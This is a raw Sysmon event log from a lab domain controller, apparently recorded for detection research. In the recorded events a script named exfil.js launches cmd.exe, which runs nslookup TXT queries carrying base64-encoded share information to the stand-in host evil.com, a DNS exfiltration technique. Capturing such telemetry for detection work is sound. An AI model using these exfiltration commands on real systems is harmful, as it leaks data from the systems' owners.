14:16:11.861{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.861{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-5C3E-000000005F02}7300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.861{2E1864BB-17AB-629A-5A3E-000000005F02}22604596C:\Windows\system32\cmd.exe{2E1864BB-17AB-629A-5C3E-000000005F02}7300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.862{2E1864BB-17AB-629A-5C3E-000000005F02}7300C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AB-629A-5A3E-000000005F02}2260C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkljd.tmp 2>&1 10341000x8000000000000000195618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.806{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-5B3E-000000005F02}4012C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.805{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-5B3E-000000005F02}4012C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.790{2E1864BB-17AB-629A-5B3E-000000005F02}40127076C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-5A3E-000000005F02}2260C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.774{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-5B3E-000000005F02}4012C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.758{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.758{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.758{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.758{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.758{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-5A3E-000000005F02}2260C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.758{2E1864BB-17A1-629A-783D-000000005F02}55526888C:\Windows\System32\WScript.exe{2E1864BB-17AB-629A-5A3E-000000005F02}2260C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.771{2E1864BB-17AB-629A-5A3E-000000005F02}2260C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkljd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.758{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltlcem.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.711{2E1864BB-17AB-629A-583E-000000005F02}37963288C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-593E-000000005F02}2104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.711{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.711{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.711{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.711{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.711{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-593E-000000005F02}2104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.711{2E1864BB-17AB-629A-573E-000000005F02}26088128C:\Windows\system32\cmd.exe{2E1864BB-17AB-629A-593E-000000005F02}2104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.712{2E1864BB-17AB-629A-593E-000000005F02}2104C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AB-629A-573E-000000005F02}2608C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltlcem.tmp 2>&1 23542300x8000000000000000195598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.689{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EB34DA2AAA616E1933E6F9A7903D3F4,SHA256=FE6C3944A82C426B858D1D6A556DDB18829772DD7ED99279C2F46E679B6C082F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.658{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-583E-000000005F02}3796C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.658{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-583E-000000005F02}3796C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.627{2E1864BB-17AB-629A-583E-000000005F02}37963288C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-573E-000000005F02}2608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.611{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-583E-000000005F02}3796C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.589{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.589{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.589{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.589{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-573E-000000005F02}2608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 